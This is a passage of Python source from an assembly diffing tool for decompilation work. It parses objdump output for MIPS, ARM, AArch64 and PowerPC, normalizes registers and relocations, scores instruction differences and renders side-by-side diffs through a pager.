branch_instructions=MIPS_BRANCH_INSTRUCTIONS,
instructions_with_address_immediates=MIPS_BRANCH_INSTRUCTIONS.union({"jal", "j"}),
delay_slot_instructions=MIPS_BRANCH_INSTRUCTIONS.union({"j", "jal", "jr", "jalr"}),
)
MIPSEL_SETTINGS = replace(MIPS_SETTINGS, name="mipsel", big_endian=False)
ARM32_SETTINGS = ArchSettings(
name="arm32",
re_int=re.compile(r"[0-9]+"),
re_comment=re.compile(r"(<.*?>|//.*$)"),
# Includes:
# - General purpose registers: r0..13
# - Frame pointer registers: lr (r14), pc (r15)
# - VFP/NEON registers: s0..31, d0..31, q0..15, fpscr, fpexc, fpsid
# SP should not be in this list.
re_reg=re.compile(
r"\$?\b([rq][0-9]|[rq]1[0-5]|pc|lr|[ds][12]?[0-9]|[ds]3[01]|fp(scr|exc|sid))\b"
),
re_sprel=re.compile(r"sp, #-?(0x[0-9a-fA-F]+|[0-9]+)\b"),
re_large_imm=re.compile(r"-?[1-9][0-9]{2,}|-?0x[0-9a-f]{3,}"),
re_imm=re.compile(r"(?<!sp, )#-?(0x[0-9a-fA-F]+|[0-9]+)\b"),
branch_instructions=ARM32_BRANCH_INSTRUCTIONS,
instructions_with_address_immediates=ARM32_BRANCH_INSTRUCTIONS.union({"adr"}),
difference_normalizer=DifferenceNormalizerARM32,
)
AARCH64_SETTINGS = ArchSettings(
name="aarch64",
re_int=re.compile(r"[0-9]+"),
re_comment=re.compile(r"(<.*?>|//.*$)"),
# GPRs and FP registers: X0-X30, W0-W30, [DSHQ]0..31
# The zero registers and SP should not be in this list.
re_reg=re.compile(r"\$?\b([dshq][12]?[0-9]|[dshq]3[01]|[xw][12]?[0-9]|[xw]30)\b"),
re_sprel=re.compile(r"sp, #-?(0x[0-9a-fA-F]+|[0-9]+)\b"),
re_large_imm=re.compile(r"-?[1-9][0-9]{2,}|-?0x[0-9a-f]{3,}"),
re_imm=re.compile(r"(?<!sp, )#-?(0x[0-9a-fA-F]+|[0-9]+)\b"),
branch_instructions=AARCH64_BRANCH_INSTRUCTIONS,
instructions_with_address_immediates=AARCH64_BRANCH_INSTRUCTIONS.union({"bl", "adrp"}),
difference_normalizer=DifferenceNormalizerAArch64,
)
PPC_SETTINGS = ArchSettings(
name="ppc",
re_int=re.compile(r"[0-9]+"),
re_comment=re.compile(r"(<.*?>|//.*$)"),
re_reg=re.compile(r"\$?\b([rf][0-9]+)\b"),
re_sprel=re.compile(r"(?<=,)(-?[0-9]+|-?0x[0-9a-f]+)\(r1\)"),
re_large_imm=re.compile(r"-?[1-9][0-9]{2,}|-?0x[0-9a-f]{3,}"),
re_imm=re.compile(r"(\b|-)([0-9]+|0x[0-9a-fA-F]+)\b(?!\(r1)|[^@]*@(ha|h|lo)"),
branch_instructions=PPC_BRANCH_INSTRUCTIONS,
instructions_with_address_immediates=PPC_BRANCH_INSTRUCTIONS.union({"bl"}),
)
ARCH_SETTINGS = [
MIPS_SETTINGS,
MIPSEL_SETTINGS,
ARM32_SETTINGS,
AARCH64_SETTINGS,
PPC_SETTINGS,
]
def hexify_int(row: str, pat: Match[str], arch: ArchSettings) -> str:
full = pat.group(0)
if len(full) <= 1:
# leave one-digit ints alone
return full
start, end = pat.span()
if start and row[start - 1] in arch.forbidden:
return full
if end < len(row) and row[end] in arch.forbidden:
return full
return hex(int(full))
def parse_relocated_line(line: str) -> Tuple[str, str, str]:
for c in ",\t ":
if c in line:
ind2 = line.rindex(c)
break
else:
raise Exception(f"failed to parse relocated line: {line}")
before = line[: ind2 + 1]
after = line[ind2 + 1 :]
ind2 = after.find("(")
if ind2 == -1:
imm, after = after, ""
else:
imm, after = after[:ind2], after[ind2:]
if imm == "0x0":
imm = "0"
return before, imm, after
def process_mips_reloc(row: str, prev: str, arch: ArchSettings) -> str:
if "R_MIPS_NONE" in row:
# GNU as emits no-op relocations immediately after real ones when
# assembling with -mabi=64. Return without trying to parse 'imm' as an
# integer.
return prev
before, imm, after = parse_relocated_line(prev)
repl = row.split()[-1]
if imm != "0":
# MIPS uses relocations with addends embedded in the code as immediates.
# If there is an immediate, show it as part of the relocation. Ideally
# we'd show this addend in both %lo/%hi, but annoyingly objdump's output
# doesn't include enough information to pair up %lo's and %hi's...
# TODO: handle unambiguous cases where all addends for a symbol are the
# same, or show "+???".
mnemonic = prev.split()[0]
if (
mnemonic in arch.instructions_with_address_immediates
and not imm.startswith("0x")
):
imm = "0x" + imm
repl += "+" + imm if int(imm, 0) > 0 else imm
if "R_MIPS_LO16" in row:
repl = f"%lo({repl})"
elif "R_MIPS_HI16" in row:
# Ideally we'd pair up R_MIPS_LO16 and R_MIPS_HI16 to generate a
# correct addend for each, but objdump doesn't give us the order of
# the relocations, so we can't find the right LO16. :(
repl = f"%hi({repl})"
elif "R_MIPS_26" in row:
# Function calls
pass
elif "R_MIPS_PC16" in row:
# Branch to glabel. This gives confusing output, but there's not much
# we can do here.
pass
else:
assert False, f"unknown relocation type '{row}' for line '{prev}'"
return before + repl + after
def process_ppc_reloc(row: str, prev: str) -> str:
assert any(
r in row for r in ["R_PPC_REL24", "R_PPC_ADDR16", "R_PPC_EMB_SDA21"]
), f"unknown relocation type '{row}' for line '{prev}'"
before, imm, after = parse_relocated_line(prev)
repl = row.split()[-1]
if "R_PPC_REL24" in row:
# function calls
pass
elif "R_PPC_ADDR16_HI" in row:
# absolute hi of addr
repl = f"{repl}@h"
elif "R_PPC_ADDR16_HA" in row:
# adjusted hi of addr
repl = f"{repl}@ha"
elif "R_PPC_ADDR16_LO" in row:
# lo of addr
repl = f"{repl}@l"
elif "R_PPC_ADDR16" in row:
# 16-bit absolute addr
if "+0x7" in repl:
# remove the very large addends as they are an artifact of (label-_SDA(2)_BASE_)
# computations and are unimportant in a diff setting.
if int(repl.split("+")[1], 16) > 0x70000000:
repl = repl.split("+")[0]
elif "R_PPC_EMB_SDA21" in row:
# small data area
pass
return before + repl + after
def process_arm_reloc(row: str, prev: str, arch: ArchSettings) -> str:
before, imm, after = parse_relocated_line(prev)
repl = row.split()[-1]
return before + repl + after
def pad_mnemonic(line: str) -> str:
if "\t" not in line:
return line
mn, args = line.split("\t", 1)
return f"{mn:<7s} {args}"
@dataclass
class Line:
mnemonic: str
diff_row: str
original: str
normalized_original: str
scorable_line: str
line_num: Optional[int] = None
branch_target: Optional[int] = None
source_filename: Optional[str] = None
source_line_num: Optional[int] = None
source_lines: List[str] = field(default_factory=list)
comment: Optional[str] = None
def process(dump: str, config: Config) -> List[Line]:
arch = config.arch
normalizer = arch.difference_normalizer(config)
skip_next = False
source_lines = []
source_filename = None
source_line_num = None
i = 0
num_instr = 0
data_refs: Dict[int, Dict[str, List[int]]] = defaultdict(lambda: defaultdict(list))
output: List[Line] = []
stop_after_delay_slot = False
lines = dump.split("\n")
while i < len(lines):
row = lines[i]
i += 1
if not row:
continue
if re.match(r"^[0-9a-f]+ <.*>:$", row):
continue
if row.startswith("DATAREF"):
parts = row.split(" ", 3)
text_offset = int(parts[1])
from_offset = int(parts[2])
from_section = parts[3]
data_refs[text_offset][from_section].append(from_offset)
continue
if config.diff_obj and num_instr >= config.max_function_size_lines:
output.append(
Line(
mnemonic="...",
diff_row="...",
original="...",
normalized_original="...",
scorable_line="...",
)
)
break
if not re.match(r"^ +[0-9a-f]+:\t", row):
# This regex is conservative, and assumes the file path does not contain "weird"
# characters like colons, tabs, or angle brackets.
if re.match(
r"^[^ \t<>:][^\t<>:]*:[0-9]+( \(discriminator [0-9]+\))?$", row
):
source_filename, _, tail = row.rpartition(":")
source_line_num = int(tail.partition(" ")[0])
source_lines.append(row)
continue
m_comment = re.search(arch.re_comment, row)
comment = m_comment[0] if m_comment else None
row = re.sub(arch.re_comment, "", row)
row = row.rstrip()
tabs = row.split("\t")
row = "\t".join(tabs[2:])
line_num = eval_line_num(tabs[0].strip())
if line_num in data_refs:
refs = data_refs[line_num]
ref_str = "; ".join(
section_name + "+" + ",".join(hex(off) for off in offs)
for section_name, offs in refs.items()
)
output.append(
Line(
mnemonic="<data-ref>",
diff_row="<data-ref>",
original=ref_str,
normalized_original=ref_str,
scorable_line="<data-ref>",
)
)
if "\t" in row:
row_parts = row.split("\t", 1)
else:
# powerpc-eabi-objdump doesn't use tabs
row_parts = [part.lstrip() for part in row.split(" ", 1)]
mnemonic = row_parts[0].strip()
if mnemonic not in arch.instructions_with_address_immediates:
row = re.sub(arch.re_int, lambda m: hexify_int(row, m, arch), row)
# Let 'original' be 'row' with relocations applied, while we continue
# transforming 'row' into a coarser version that ignores registers and
# immediates.
original = row
while i < len(lines):
reloc_row = lines[i]
if "R_AARCH64_" in reloc_row:
# TODO: handle relocation
pass
elif "R_MIPS_" in reloc_row:
original = process_mips_reloc(reloc_row, original, arch)
elif "R_PPC_" in reloc_row:
original = process_ppc_reloc(reloc_row, original)
elif "R_ARM_" in reloc_row:
original = process_arm_reloc(reloc_row, original, arch)
else:
break
i += 1
normalized_original = normalizer.normalize(mnemonic, original)
scorable_line = normalized_original
if not config.score_stack_differences:
scorable_line = re.sub(arch.re_sprel, "addr(sp)", scorable_line)
if mnemonic in arch.branch_instructions:
# Replace the final argument with "<target>"
scorable_line = re.sub(r"[^, \t]+$", "<target>", scorable_line)
if skip_next:
skip_next = False
row = "<delay-slot>"
mnemonic = "<delay-slot>"
scorable_line = "<delay-slot>"
if mnemonic in arch.branch_likely_instructions:
skip_next = True
row = re.sub(arch.re_reg, "<reg>", row)
row = re.sub(arch.re_sprel, "addr(sp)", row)
row_with_imm = row
if mnemonic in arch.instructions_with_address_immediates:
row = row.strip()
row, _ = split_off_address(row)
row += "<imm>"
else:
row = normalize_imms(row, arch)
branch_target = None
if mnemonic in arch.branch_instructions:
branch_target = int(row_parts[1].strip().split(",")[-1], 16)
if mnemonic in arch.branch_likely_instructions:
branch_target -= 4
output.append(
Line(
mnemonic=mnemonic,
diff_row=row,
original=original,
normalized_original=normalized_original,
scorable_line=scorable_line,
line_num=line_num,
branch_target=branch_target,
source_filename=source_filename,
source_line_num=source_line_num,
source_lines=source_lines,
comment=comment,
)
)
num_instr += 1
source_lines = []
if config.stop_jrra and mnemonic == "jr" and row_parts[1].strip() == "ra":
stop_after_delay_slot = True
elif stop_after_delay_slot:
break
return output
def normalize_imms(row: str, arch: ArchSettings) -> str:
return re.sub(arch.re_imm, "<imm>", row)
def normalize_stack(row: str, arch: ArchSettings) -> str:
return re.sub(arch.re_sprel, "addr(sp)", row)
def imm_matches_everything(row: str, arch: ArchSettings) -> bool:
# (this should probably be arch-specific)
return "(." in row
def split_off_address(line: str) -> Tuple[str, str]:
"""Split e.g. 'beqz $r0,1f0' into 'beqz $r0,' and '1f0'."""
parts = line.split(",")
if len(parts) < 2:
parts = line.split(None, 1)
off = len(line) - len(parts[-1])
return line[:off], line[off:]
def diff_sequences_difflib(
seq1: List[str], seq2: List[str]
) -> List[Tuple[str, int, int, int, int]]:
differ = difflib.SequenceMatcher(a=seq1, b=seq2, autojunk=False)
return differ.get_opcodes()
def diff_sequences(
seq1: List[str], seq2: List[str], algorithm: str
) -> List[Tuple[str, int, int, int, int]]:
if (
algorithm != "levenshtein"
or len(seq1) * len(seq2) > 4 * 10 ** 8
or len(seq1) + len(seq2) >= 0x110000
):
return diff_sequences_difflib(seq1, seq2)
# The Levenshtein library assumes that we compare strings, not lists. Convert.
# (Per the check above we know we have fewer than 0x110000 unique elements, so chr() works.)
remapping: Dict[str, str] = {}
def remap(seq: List[str]) -> str:
seq = seq[:]
for i in range(len(seq)):
val = remapping.get(seq[i])
if val is None:
val = chr(len(remapping))
remapping[seq[i]] = val
seq[i] = val
return "".join(seq)
rem1 = remap(seq1)
rem2 = remap(seq2)
import Levenshtein
ret: List[Tuple[str, int, int, int, int]] = Levenshtein.opcodes(rem1, rem2)
return ret
def diff_lines(
lines1: List[Line],
lines2: List[Line],
algorithm: str,
) -> List[Tuple[Optional[Line], Optional[Line]]]:
ret = []
for (tag, i1, i2, j1, j2) in diff_sequences(
[line.mnemonic for line in lines1],
[line.mnemonic for line in lines2],
algorithm,
):
for line1, line2 in itertools.zip_longest(lines1[i1:i2], lines2[j1:j2]):
if tag == "replace":
if line1 is None:
tag = "insert"
elif line2 is None:
tag = "delete"
elif tag == "insert":
assert line1 is None
elif tag == "delete":
assert line2 is None
ret.append((line1, line2))
return ret
def score_diff_lines(
lines: List[Tuple[Optional[Line], Optional[Line]]], config: Config
) -> int:
# This logic is copied from `scorer.py` from the decomp permuter project
# https://github.com/simonlindholm/decomp-permuter/blob/main/src/scorer.py
score = 0
deletions = []
insertions = []
def lo_hi_match(old: str, new: str) -> bool:
# TODO: Make this arch-independent, like `imm_matches_everything()`
old_lo = old.find("%lo")
old_hi = old.find("%hi")
new_lo = new.find("%lo")
new_hi = new.find("%hi")
if old_lo != -1 and new_lo != -1:
old_idx = old_lo
new_idx = new_lo
elif old_hi != -1 and new_hi != -1:
old_idx = old_hi
new_idx = new_hi
else:
return False
if old[:old_idx] != new[:new_idx]:
return False
old_inner = old[old_idx + 4 : -1]
new_inner = new[new_idx + 4 : -1]
return old_inner.startswith(".") or new_inner.startswith(".")
def diff_sameline(old: str, new: str) -> None:
nonlocal score
if old == new:
return
if lo_hi_match(old, new):
return
ignore_last_field = False
if config.score_stack_differences:
oldsp = re.search(config.arch.re_sprel, old)
newsp = re.search(config.arch.re_sprel, new)
if oldsp and newsp:
oldrel = int(oldsp.group(1) or "0", 0)
newrel = int(newsp.group(1) or "0", 0)
score += abs(oldrel - newrel) * config.penalty_stackdiff
ignore_last_field = True
# Probably regalloc difference, or signed vs unsigned
# Compare each field in order
newfields, oldfields = new.split(","), old.split(",")
if ignore_last_field:
newfields = newfields[:-1]
oldfields = oldfields[:-1]
for nf, of in zip(newfields, oldfields):
if nf != of:
score += config.penalty_regalloc
# Penalize any extra fields
score += abs(len(newfields) - len(oldfields)) * config.penalty_regalloc
def diff_insert(line: str) -> None:
# Reordering or totally different codegen.
# Defer this until later when we can tell.
insertions.append(line)
def diff_delete(line: str) -> None:
deletions.append(line)
# Find the end of the last long streak of matching mnemonics, if it looks
# like the objdump output was truncated. This is used to skip scoring
# misaligned lines at the end of the diff.
last_mismatch = -1
max_index = None
lines_were_truncated = False
for index, (line1, line2) in enumerate(lines):
if (line1 and line1.original == "...") or (line2 and line2.original == "..."):
lines_were_truncated = True
if line1 and line2 and line1.mnemonic == line2.mnemonic:
if index - last_mismatch >= 50:
max_index = index
else:
last_mismatch = index
if not lines_were_truncated:
max_index = None
for index, (line1, line2) in enumerate(lines):
if max_index is not None and index > max_index:
break
if line1 and line2 and line1.mnemonic == line2.mnemonic:
diff_sameline(line1.scorable_line, line2.scorable_line)
else:
if line1:
diff_delete(line1.scorable_line)
if line2:
diff_insert(line2.scorable_line)
insertions_co = Counter(insertions)
deletions_co = Counter(deletions)
for item in insertions_co + deletions_co:
ins = insertions_co[item]
dels = deletions_co[item]
common = min(ins, dels)
score += (
(ins - common) * config.penalty_insertion
+ (dels - common) * config.penalty_deletion
+ config.penalty_reordering * common
)
return score
@dataclass(frozen=True)
class OutputLine:
base: Optional[Text] = field(compare=False)
fmt2: Text = field(compare=False)
key2: Optional[str]
boring: bool = field(compare=False)
is_data_ref: bool = field(compare=False)
line1: Optional[Line] = field(compare=False)
line2: Optional[Line] = field(compare=False)
@dataclass(frozen=True)
class Diff:
lines: List[OutputLine]
score: int
max_score: int
def trim_nops(lines: List[Line], arch: ArchSettings) -> List[Line]:
lines = lines[:]
while lines and lines[-1].mnemonic == "nop" and (len(lines) == 1 or lines[-2].mnemonic not in arch.delay_slot_instructions):
lines.pop()
return lines
def do_diff(lines1: List[Line], lines2: List[Line], config: Config) -> Diff:
if config.show_source:
import cxxfilt
arch = config.arch
fmt = config.formatter
output: List[OutputLine] = []
sc1 = symbol_formatter("base-reg", 0)
sc2 = symbol_formatter("my-reg", 0)
sc3 = symbol_formatter("base-stack", 4)
sc4 = symbol_formatter("my-stack", 4)
sc5 = symbol_formatter("base-branch", 0)
sc6 = symbol_formatter("my-branch", 0)
bts1: Set[int] = set()
bts2: Set[int] = set()
if config.show_branches:
for (lines, btset, sc) in [
(lines1, bts1, sc5),
(lines2, bts2, sc6),
]:
for line in lines:
bt = line.branch_target
if bt is not None:
btset.add(bt)
sc(str(bt))
lines1 = trim_nops(lines1, arch)
lines2 = trim_nops(lines2, arch)
diffed_lines = diff_lines(lines1, lines2, config.algorithm)
score = score_diff_lines(diffed_lines, config)
max_score = len(lines1) * config.penalty_deletion
line_num_base = -1
line_num_offset = 0
line_num_2to1 = {}
for (line1, line2) in diffed_lines:
if line1 is not None and line1.line_num is not None:
line_num_base = line1.line_num
line_num_offset = 0
else:
line_num_offset += 1
if line2 is not None and line2.line_num is not None:
line_num_2to1[line2.line_num] = (line_num_base, line_num_offset)
for (line1, line2) in diffed_lines:
line_color1 = line_color2 = sym_color = BasicFormat.NONE
line_prefix = " "
is_data_ref = False
out1 = Text() if not line1 else Text(pad_mnemonic(line1.original))
out2 = Text() if not line2 else Text(pad_mnemonic(line2.original))
if line1 and line2 and line1.diff_row == line2.diff_row:
if line1.diff_row == "<data-ref>":
if line1.normalized_original != line2.normalized_original:
line_prefix = "i"
sym_color = BasicFormat.DIFF_CHANGE
out1 = out1.reformat(sym_color)
out2 = out2.reformat(sym_color)
is_data_ref = True
elif (
line1.normalized_original == line2.normalized_original
and line2.branch_target is None
):
# Fast path: no coloring needed. We don't include branch instructions
# in this case because we need to check that their targets line up in
# the diff, and don't just happen to have the are the same address
# by accident.
pass
elif line1.diff_row == "<delay-slot>":
# Don't draw attention to differing branch-likely delay slots: they
# typically mirror the branch destination - 1 so the real difference
# is elsewhere. Still, do mark them as different to avoid confusion.
# No need to consider branches because delay slots can't branch.
out1 = out1.reformat(BasicFormat.DELAY_SLOT)
out2 = out2.reformat(BasicFormat.DELAY_SLOT)
else:
mnemonic = line1.original.split()[0]
branchless1, address1 = out1.plain(), ""
branchless2, address2 = out2.plain(), ""
if mnemonic in arch.instructions_with_address_immediates:
branchless1, address1 = split_off_address(branchless1)
branchless2, address2 = split_off_address(branchless2)
out1 = Text(branchless1)
out2 = Text(branchless2)
out1, out2 = format_fields(
arch.re_imm, out1, out2, lambda _: BasicFormat.IMMEDIATE
)
if line2.branch_target is not None:
target = line2.branch_target
line2_target = line_num_2to1.get(line2.branch_target)
if line2_target is None:
# If the target is outside the disassembly, extrapolate.
# This only matters near the bottom.
assert line2.line_num is not None
line2_line = line_num_2to1[line2.line_num]
line2_target = (line2_line[0] + (target - line2.line_num), 0)
# Set the key for three-way diffing to a normalized version.
norm2, norm_branch2 = split_off_address(line2.normalized_original)
if norm_branch2 != "<ign>":
line2.normalized_original = norm2 + str(line2_target)
same_target = line2_target == (line1.branch_target, 0)
else:
# Do a naive comparison for non-branches (e.g. function calls).
same_target = address1 == address2
if normalize_imms(branchless1, arch) == normalize_imms(
branchless2, arch
):
if imm_matches_everything(branchless2, arch):
# ignore differences due to %lo(.rodata + ...) vs symbol
out1 = out1.reformat(BasicFormat.NONE)
out2 = out2.reformat(BasicFormat.NONE)
elif line2.branch_target is not None and same_target:
# same-target branch, don't color
pass
else:
# must have an imm difference (or else we would have hit the
# fast path)
sym_color = BasicFormat.IMMEDIATE
line_prefix = "i"
else:
out1, out2 = format_fields(arch.re_sprel, out1, out2, sc3, sc4)
if normalize_stack(branchless1, arch) == normalize_stack(
branchless2, arch
):
# only stack differences (luckily stack and imm
# differences can't be combined in MIPS, so we
# don't have to think about that case)
sym_color = BasicFormat.STACK
line_prefix = "s"
else:
# reg differences and maybe imm as well
out1, out2 = format_fields(arch.re_reg, out1, out2, sc1, sc2)
line_color1 = line_color2 = sym_color = BasicFormat.REGISTER
line_prefix = "r"
if same_target:
address_imm_fmt = BasicFormat.NONE
else:
address_imm_fmt = BasicFormat.IMMEDIATE
out1 += Text(address1, address_imm_fmt)
out2 += Text(address2, address_imm_fmt)
elif line1 and line2:
line_prefix = "|"
line_color1 = line_color2 = sym_color = BasicFormat.DIFF_CHANGE
out1 = out1.reformat(line_color1)
out2 = out2.reformat(line_color2)
elif line1:
line_prefix = "<"
line_color1 = sym_color = BasicFormat.DIFF_REMOVE
out1 = out1.reformat(line_color1)
out2 = Text()
elif line2:
line_prefix = ">"
line_color2 = sym_color = BasicFormat.DIFF_ADD
out1 = Text()
out2 = out2.reformat(line_color2)
if config.show_source and line2 and line2.comment:
out2 += f" {line2.comment}"
def format_part(
out: Text,
line: Optional[Line],
line_color: Format,
btset: Set[int],
sc: FormatFunction,
) -> Optional[Text]:
if line is None:
return None
if line.line_num is None:
return out
in_arrow = Text(" ")
out_arrow = Text()
if config.show_branches:
if line.line_num in btset:
in_arrow = Text("~>", sc(str(line.line_num)))
if line.branch_target is not None:
out_arrow = " " + Text("~>", sc(str(line.branch_target)))
formatted_line_num = Text(hex(line.line_num)[2:] + ":", line_color)
return formatted_line_num + " " + in_arrow + " " + out + out_arrow
part1 = format_part(out1, line1, line_color1, bts1, sc5)
part2 = format_part(out2, line2, line_color2, bts2, sc6)
if config.show_source and line2:
for source_line in line2.source_lines:
line_format = BasicFormat.SOURCE_OTHER
if config.source_old_binutils:
if source_line and re.fullmatch(".*\.c(?:pp)?:\d+", source_line):
line_format = BasicFormat.SOURCE_FILENAME
elif source_line and source_line.endswith("():"):
line_format = BasicFormat.SOURCE_FUNCTION
try:
source_line = cxxfilt.demangle(
source_line[:-3], external_only=False
)
except:
pass
else:
# File names and function names
if source_line and source_line[0] != "│":
line_format = BasicFormat.SOURCE_FILENAME
# Function names
if source_line.endswith("():"):
line_format = BasicFormat.SOURCE_FUNCTION
try:
source_line = cxxfilt.demangle(
source_line[:-3], external_only=False
)
except:
pass
padding = " " * 7 if config.show_line_numbers else " " * 2
output.append(
OutputLine(
base=None,
fmt2=padding + Text(source_line, line_format),
key2=source_line,
boring=True,
is_data_ref=False,
line1=None,
line2=None,
)
)
key2 = line2.normalized_original if line2 else None
boring = False
if line_prefix == " ":
boring = True
elif config.compress and config.compress.same_instr and line_prefix in "irs":
boring = True
if config.show_line_numbers:
if line2 and line2.source_line_num is not None:
num_color = (
BasicFormat.SOURCE_LINE_NUM
if sym_color == BasicFormat.NONE
else sym_color
)
num2 = Text(f"{line2.source_line_num:5}", num_color)
else:
num2 = Text(" " * 5)
else:
num2 = Text()
fmt2 = Text(line_prefix, sym_color) + num2 + " " + (part2 or Text())
output.append(
OutputLine(
base=part1,
fmt2=fmt2,
key2=key2,
boring=boring,
is_data_ref=is_data_ref,
line1=line1,
line2=line2,
)
)
output = output[config.skip_lines :]
return Diff(lines=output, score=score, max_score=max_score)
def chunk_diff_lines(
diff: List[OutputLine],
) -> List[Union[List[OutputLine], OutputLine]]:
"""Chunk a diff into an alternating list like A B A B ... A, where:
* A is a List[OutputLine] of insertions,
* B is a single non-insertion OutputLine, with .base != None."""
cur_right: List[OutputLine] = []
chunks: List[Union[List[OutputLine], OutputLine]] = []
for output_line in diff:
if output_line.base is not None:
chunks.append(cur_right)
chunks.append(output_line)
cur_right = []
else:
cur_right.append(output_line)
chunks.append(cur_right)
return chunks
def compress_matching(
li: List[Tuple[OutputLine, ...]], context: int
) -> List[Tuple[OutputLine, ...]]:
ret: List[Tuple[OutputLine, ...]] = []
matching_streak: List[Tuple[OutputLine, ...]] = []
context = max(context, 0)
def flush_matching() -> None:
if len(matching_streak) <= 2 * context + 1:
ret.extend(matching_streak)
else:
ret.extend(matching_streak[:context])
skipped = len(matching_streak) - 2 * context
filler = OutputLine(
base=Text(f"<{skipped} lines>", BasicFormat.SOURCE_OTHER),
fmt2=Text(),
key2=None,
boring=False,
is_data_ref=False,
line1=None,
line2=None,
)
columns = len(matching_streak[0])
ret.append(tuple([filler] * columns))
if context > 0:
ret.extend(matching_streak[-context:])
matching_streak.clear()
for line in li:
if line[0].boring:
matching_streak.append(line)
else:
flush_matching()
ret.append(line)
flush_matching()
return ret
def align_diffs(
old_diff: Diff, new_diff: Diff, config: Config
) -> Tuple[TableMetadata, List[Tuple[OutputLine, ...]]]:
meta: TableMetadata
diff_lines: List[Tuple[OutputLine, ...]]
padding = " " * 7 if config.show_line_numbers else " " * 2
if config.threeway:
meta = TableMetadata(
headers=(
Text("TARGET"),
Text(f"{padding}CURRENT ({new_diff.score})"),
Text(f"{padding}PREVIOUS ({old_diff.score})"),
),
current_score=new_diff.score,
max_score=new_diff.max_score,
previous_score=old_diff.score,
)
old_chunks = chunk_diff_lines(old_diff.lines)
new_chunks = chunk_diff_lines(new_diff.lines)
diff_lines = []
empty = OutputLine(Text(), Text(), None, True, False, None, None)
assert len(old_chunks) == len(new_chunks), "same target"
for old_chunk, new_chunk in zip(old_chunks, new_chunks):
if isinstance(old_chunk, list):
assert isinstance(new_chunk, list)
if not old_chunk and not new_chunk:
# Most of the time lines sync up without insertions/deletions,
# and there's no interdiffing to be done.
continue
differ = difflib.SequenceMatcher(
a=old_chunk, b=new_chunk, autojunk=False
)
for (tag, i1, i2, j1, j2) in differ.get_opcodes():
if tag in ["equal", "replace"]:
for i, j in zip(range(i1, i2), range(j1, j2)):
diff_lines.append((empty, new_chunk[j], old_chunk[i]))
if tag in ["insert", "replace"]:
for j in range(j1 + i2 - i1, j2):
diff_lines.append((empty, new_chunk[j], empty))
if tag in ["delete", "replace"]:
for i in range(i1 + j2 - j1, i2):
diff_lines.append((empty, empty, old_chunk[i]))
else:
assert isinstance(new_chunk, OutputLine)
# old_chunk.base and new_chunk.base have the same text since
# both diffs are based on the same target, but they might
# differ in color. Use the new version.
diff_lines.append((new_chunk, new_chunk, old_chunk))
diff_lines = [
(base, new, old if old != new else empty) for base, new, old in diff_lines
]
else:
meta = TableMetadata(
headers=(
Text("TARGET"),
Text(f"{padding}CURRENT ({new_diff.score})"),
),
current_score=new_diff.score,
max_score=new_diff.max_score,
previous_score=None,
)
diff_lines = [(line, line) for line in new_diff.lines]
if config.compress:
diff_lines = compress_matching(diff_lines, config.compress.context)
return meta, diff_lines
def debounced_fs_watch(
targets: List[str],
outq: "queue.Queue[Optional[float]]",
config: Config,
project: ProjectSettings,
) -> None:
import watchdog.events
import watchdog.observers
class WatchEventHandler(watchdog.events.FileSystemEventHandler):
def __init__(
self, queue: "queue.Queue[float]", file_targets: List[str]
) -> None:
self.queue = queue
self.file_targets = file_targets
def on_modified(self, ev: object) -> None:
if isinstance(ev, watchdog.events.FileModifiedEvent):
self.changed(ev.src_path)
def on_moved(self, ev: object) -> None:
if isinstance(ev, watchdog.events.FileMovedEvent):
self.changed(ev.dest_path)
def should_notify(self, path: str) -> bool:
for target in self.file_targets:
if os.path.normpath(path) == target:
return True
if config.make and any(
path.endswith(suffix) for suffix in project.source_extensions
):
return True
return False
def changed(self, path: str) -> None:
if self.should_notify(path):
self.queue.put(time.time())
def debounce_thread() -> NoReturn:
listenq: "queue.Queue[float]" = queue.Queue()
file_targets: List[str] = []
event_handler = WatchEventHandler(listenq, file_targets)
observer = watchdog.observers.Observer()
observed = set()
for target in targets:
if os.path.isdir(target):
observer.schedule(event_handler, target, recursive=True)
else:
file_targets.append(os.path.normpath(target))
target = os.path.dirname(target) or "."
if target not in observed:
observed.add(target)
observer.schedule(event_handler, target)
observer.start()
while True:
t = listenq.get()
more = True
while more:
delay = t + DEBOUNCE_DELAY - time.time()
if delay > 0:
time.sleep(delay)
# consume entire queue
more = False
try:
while True:
t = listenq.get(block=False)
more = True
except queue.Empty:
pass
outq.put(t)
th = threading.Thread(target=debounce_thread, daemon=True)
th.start()
class Display:
basedump: str
mydump: str
last_refresh_key: object
config: Config
emsg: Optional[str]
last_diff_output: Optional[Diff]
pending_update: Optional[str]
ready_queue: "queue.Queue[None]"
watch_queue: "queue.Queue[Optional[float]]"
less_proc: "Optional[subprocess.Popen[bytes]]"
def __init__(self, basedump: str, mydump: str, config: Config) -> None:
self.config = config
self.base_lines = process(basedump, config)
self.mydump = mydump
self.emsg = None
self.last_refresh_key = None
self.last_diff_output = None
def run_diff(self) -> Tuple[str, object]:
if self.emsg is not None:
return (self.emsg, self.emsg)
my_lines = process(self.mydump, self.config)
diff_output = do_diff(self.base_lines, my_lines, self.config)
last_diff_output = self.last_diff_output or diff_output
if self.config.threeway != "base" or not self.last_diff_output:
self.last_diff_output = diff_output
meta, diff_lines = align_diffs(last_diff_output, diff_output, self.config)
output = self.config.formatter.table(meta, diff_lines)
refresh_key = (
[line.key2 for line in diff_output.lines],
diff_output.score,
)
return (output, refresh_key)
def run_less(
self, output: str
) -> "Tuple[subprocess.Popen[bytes], subprocess.Popen[bytes]]":
# Pipe the output through 'tail' and only then to less, to ensure the
# write call doesn't block. ('tail' has to buffer all its input before
# it starts writing.) This also means we don't have to deal with pipe
# closure errors.
buffer_proc = subprocess.Popen(
BUFFER_CMD, stdin=subprocess.PIPE, stdout=subprocess.PIPE
)
less_proc = subprocess.Popen(LESS_CMD, stdin=buffer_proc.stdout)
assert buffer_proc.stdin
assert buffer_proc.stdout
buffer_proc.stdin.write(output.encode())
buffer_proc.stdin.close()
buffer_proc.stdout.close()
return (buffer_proc, less_proc)
def run_sync(self) -> None:
output, _ = self.run_diff()
proca, procb = self.run_less(output)
procb.wait()
proca.wait()
def run_async(self, watch_queue: "queue.Queue[Optional[float]]") -> None:
self.watch_queue = watch_queue
self.ready_queue = queue.Queue()
self.pending_update = None
output, refresh_key = self.run_diff()
self.last_refresh_key = refresh_key
dthread = threading.Thread(target=self.display_thread, args=(output,))
dthread.start()
self.ready_queue.get()
def display_thread(self, initial_output: str) -> None:
proca, procb = self.run_less(initial_output)
self.less_proc = procb
self.ready_queue.put(None)
while True:
ret = procb.wait()
proca.wait()
self.less_proc = None
if ret != 0:
# fix the terminal
os.system("tput reset")
